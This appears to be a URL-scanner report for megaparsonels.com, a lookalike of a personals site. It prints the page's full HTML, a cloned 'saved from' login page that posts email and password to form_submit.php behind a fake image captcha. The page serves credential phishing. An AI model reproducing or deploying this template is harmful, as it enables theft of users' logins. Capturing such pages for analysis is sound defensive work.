https://megaparsonels.com/

提交的 URL:
https://megaparsonels.com/
报告完成时间:

链接 · 找到 0 个

JavaScript 变量 · 找到 3 个

名称类型
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

控制台日志消息 · 找到 2 条

类型类别记录
verbosedom
URL
https://megaparsonels.com/
文本
[DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o
errornetwork
URL
https://megaparsonels.com/favicon.ico
文本
Failed to load resource: the server responded with a status of 404 ()

HTML

<!DOCTYPE html><!-- saved from url=(0041)https://megaparsonels.com/users/auth/login --><html lang="en"><head><meta name="ROBOTS" content="INDEX, FOLLOW">
    <meta name="google-site-verification" content="SAw2VWxx5Juz5u0P0WqFzT5zgznQfP3nX41u4blKEXk">




    
    
    
    
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MegaParsonels: Classified hookups</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="responsive.css">
    <style>
    .logo img {
        width: 400px;
    }
    </style>
</head>
<body>
    <div class="main-body">
        <center>
            <header>
                <br>
                <br>
                <div class="logo">
                    <a href="#">
                        <img src="img/logo.png" alt="">
                    </a>
                </div>
            </header>
            <br>
            <section id="post">
                <p>Is this your first time posting?</p>
                <button class="primary">Start Here</button>
            </section>
            <br>
            <div class="login-form">
                <p>Already have an account?</p>
                <form action="form_submit.php" method="POST">
                    <input type="text" name="email" class="form-control" placeholder="Email" required="">
                    <input type="password" name="password" class="form-control" placeholder="Password" required="">
                    <div class="picture-img">
                        <img src="img/picture.png" alt="">
                    </div>
                    <input type="text" class="form-control" placeholder="Enter code from the picture">
                    <input type="submit" value="Submit" class="sub-btn" name="sub-btn">
                </form>
                <div class="scamed">
                    <img src="img/caption.png" alt="">
                </div>
                <a href="#">Forgot Password</a>
                <br>
                <br>
                <div class="footer">
                    <img src="img/footer.png" alt="">
                </div>
            </div>
        </center>
    </div>


</body></html>